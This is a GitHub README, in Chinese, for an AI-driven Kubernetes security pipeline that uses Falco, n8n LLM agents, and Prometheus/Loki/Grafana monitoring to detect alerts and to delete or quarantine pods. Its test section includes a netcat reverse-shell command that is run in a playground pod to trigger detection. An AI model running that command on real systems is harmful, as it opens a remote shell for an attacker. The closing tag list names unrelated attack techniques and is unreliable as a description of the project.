holydanchik/k8s-ai-agent

GitHub: holydanchik/k8s-ai-agent

AI驱动的Kubernetes安全响应自动化工具

Stars: 0 | Forks: 0

# AI 驱动的 Kubernetes 运行时安全系统 ### *Falco + n8n AI 代理 + ROSES + RACE + Prometheus + Loki + Grafana* 本项目实现了一个完全自动化的、**AI 增强的安全和响应管道**，用于 Kubernetes。它使用 **Falco** 检测威胁，使用基于 **LLM 的 ROSES & RACE 代理** 分析事件，执行自主修复操作，并将 **SRE 级别的指标** 导出至 Prometheus，同时将日志流式传输至 Loki 以实现全面的可观察性。 # 📌 架构概述 ``` Falco → Falcosidekick → n8n Webhook ↓ ┌────────────────────────────────────────────┐ │ n8n AI Pipeline │ │--------------------------------------------│ │ ROSES → JSON Parser → RACE → JSON Parser │ │ → Decision Switch → K8s API Actions │ │ → Pushgateway (Prometheus Metrics) │ │ → Loki (Log Storage) │ └────────────────────────────────────────────┘ ↓ Grafana Dashboards ``` # 🚀 快速入门 ## 1. 部署整个系统 ``` ./deploy.sh ``` 此脚本安装： - KIND Kubernetes 集群 - Falco + Falcosidekick UI - n8n 配置 NodePort - RBAC + ServiceAccount 令牌 - Loki + Promtail + Grafana - Prometheus + Pushgateway - 隔离 NetworkPolicy - 演练测试 pod # 🌐 访问 URL 安装后： ``` Falco UI: http://localhost:32040 n8n UI: http://localhost:30008 Grafana: http://localhost:30300 Prometheus: http://localhost:30900 Pushgateway: http://localhost:30123 ``` 脚本自动打印 n8n Kubernetes API 令牌。 # ## 1. Webhook（Falco → n8n）接收 JSON Falco 警报。 ## 2. ROSES AI 代理 - 使用 ROSES 框架分析事件： - 角色 - 目标 - 步骤 - 证据 - 摘要 ## 3. ROSES JSON 解析器使用正则表达式提取有效 JSON： ``` const raw = $input.first().json.output; const jsonMatch = raw.match(/\{(?:[^{}]|(?:\{[^{}]*\}))*\}/); return [{ json: JSON.parse(jsonMatch[0]) }]; ``` ## 4. RACE AI 代理做出最终决定： - 删除 pod - 隔离 pod - 忽略 - 升级 ## 5. RACE 解析器（与 ROSES 解析器相同的逻辑） ## 6. 构建 Prometheus 指标 ``` return [{ json: { mtta: 4.2, mttr: 4.2, classification: "true_positive", decision: "delete_pod" } }]; ``` ## 7. Pushgateway HTTP 请求 ``` POST /metrics/job/incident-pipeline Content-Type: text/plain incident_pipeline_mtta_seconds 4.2 incident_pipeline_mttr_seconds 4.2 incident_pipeline_incident_total{classification="true_positive"} 1 incident_pipeline_decision_total{decision="delete_pod"} 1 incident_pipeline_events_total 1 ``` ## 8. 切换 Node → Kubernetes API 决策逻辑： ``` delete_pod → kubectl delete pod quarantine_pod → patch label + apply NetworkPolicy escalate → external webhook / Slack ignore → do nothing ``` # 🧪 测试演练 pod 脚本部署： ``` kubectl apply -f manifests/playground/pod-delete.yaml kubectl apply -f manifests/playground/pod-quarantine.yaml kubectl apply -f manifests/playground/escalate-test.yaml kubectl apply -f manifests/playground/test-shell.yaml ``` 在 pod 内运行命令以触发 Falco，例如： ``` kubectl exec -n playground -it pod-delete-test -- nc 1.1.1.1 4444 -e /bin/sh ``` # 🔒 隔离模式修补 pod： ``` kubectl patch pod pod-quarantine-test \ -n playground \ -p '{"metadata":{"labels":{"security/quarantined":"true"}}}' ``` 自动隔离 NetworkPolicy： ``` apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: quarantine spec: podSelector: matchLabels: security/quarantined: "true" ingress: [] egress: [] policyTypes: - Ingress - Egress ``` # 📊 Prometheus 指标 ## MTTA 平均确认时间： ``` avg_over_time(incident_pipeline_mtta_seconds[24h]) ``` ## 平均维修时间平均响应时间： ``` avg_over_time(incident_pipeline_mttr_seconds[24h]) ``` ## 假阳性率 ``` sum(incident_pipeline_incident_total{classification="false_positive"}) / sum(incident_pipeline_incident_total) ``` ## 决策分布 ``` sum by(decision) (incident_pipeline_decision_total) ``` # 📝 Loki 日志存储 n8n 推送结构化日志： ``` { "decision": "delete_pod", "classification": "true_positive", "pod": "pod-delete-test", "timestamp": "2025-12-11T06:33:14Z" } ``` 在 Grafana Explore 中查询： ``` {job="incident-pipeline"} ``` # 📈 Grafana 仪表板推荐面板： ## MTTA 趋势 ``` incident_pipeline_mtta_seconds ``` ## MTTR 趋势 ``` incident_pipeline_mttr_seconds ``` ## 决策分布（饼图） ``` sum(incident_pipeline_decision_total) by (decision) ``` ## 分类热图 ``` sum(incident_pipeline_incident_total) by (classification) ``` ## Loki 日志表 ``` {job="incident-pipeline"} ``` # 📂 仓库结构 ``` ├── cluster/ │ └── kind-config.yaml ├── deploy.sh ├── manifests/ │ ├── falco/ │ ├── n8n/ │ ├── monitoring/ │ ├── playground/ │ ├── policy/ │ └── token/ └── README.md ``` # 🛡 安全注意事项 - 所有操作使用受限的 ServiceAccount - 只允许 pod 删除 / 修补 - 所有决策记录 - 所有指标导出 - 通过 Loki 可获得完整的可追溯性 # 🎯 结论本项目展示了生产级别的 AI 驱动的 Kubernetes 安全管道： ✔ 实时检测（Falco） ✔ AI 推理（ROSES） ✔ AI 分类（RACE） ✔ 自主修复（n8n + K8s API） ✔ MTTA/MTTR/FPR 可观察性（Prometheus） ✔ 完整审计日志（Loki） ✔ 仪表板（Grafana）这是一个完整的、研究就绪和生产就绪的系统，适用于 AI 驱动的 SecOps / AIOps / 云安全自动化。

标签：AI分析, AMSI绕过, Falco, Grafana, JSON解析, Loki, n8n, OISF, RACE, ROSES, Webhook, Web截图, 事件分析, 人工智能, 力导向图, 威胁检测, 子域名突变, 安全事件检测, 安全响应, 安全指标, 安全架构, 容器安全, 快速启动, 性能监控, 敏感词过滤, 日志审计, 日志管理, 模块化设计, 用户模式Hook绕过, 系统部署, 网络策略, 脚本部署, 自动化修复, 自动化响应, 自定义请求头, 请求拦截, 逆向工具